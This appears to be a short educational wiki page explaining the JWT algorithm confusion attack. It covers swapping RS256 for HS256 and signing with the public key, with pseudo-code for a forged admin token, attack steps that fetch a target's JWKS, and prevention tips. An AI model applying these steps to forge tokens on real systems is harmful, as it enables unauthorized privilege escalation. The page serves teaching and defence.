JWT Algorithm Confusion Attack

JWT Algorithm Confusion (also called Key Confusion or Algorithm Substitution) is an attack where an attacker changes the signing algorithm from asymmetric (like RS256) to symmetric (HS256), then uses the public key as the HMAC secret to forge valid signatures.

How It Works

When an application uses RS256, it signs with a private key and verifies with the public key. If the server's JWT library accepts HS256, an attacker can:

1. Obtain the public key (often publicly available)
2. Change the algorithm header to HS256
3. Sign the token using the public key as an HMAC secret
4. The server verifies using the same public key as secret - signature matches!

Example

// Original token (RS256)
{"alg": "RS256", "typ": "JWT"}
{"sub": "user", "admin": false}
[signature with private key]

// Forged token (HS256)
{"alg": "HS256", "typ": "JWT"}
{"sub": "user", "admin": true}
[HMAC signature using public key as secret]

// Vulnerable server verifies:
HMAC_verify(token, public_key) == signature ✓

Attack Steps

// 1. Get public key
curl https://target.com/.well-known/jwks.json

// 2. Convert to PEM if needed
// 3. Modify token claims
// 4. Sign with: HMAC-SHA256(header.payload, public_key_bytes)

Prevention

• Explicitly specify expected algorithm in verification code
• Use separate keys for symmetric and asymmetric algorithms
• Reject tokens with unexpected algorithms
• Use modern JWT libraries that prevent this by default

PentesterLab Exercises

• JWT Exercises

See Also

• JSON Web Token (JWT)
• JWT None Algorithm Attack
• JWT Key Confusion Attack